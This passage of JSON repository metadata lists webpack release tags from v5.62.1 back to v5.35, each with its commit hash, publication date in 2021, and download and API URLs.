webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack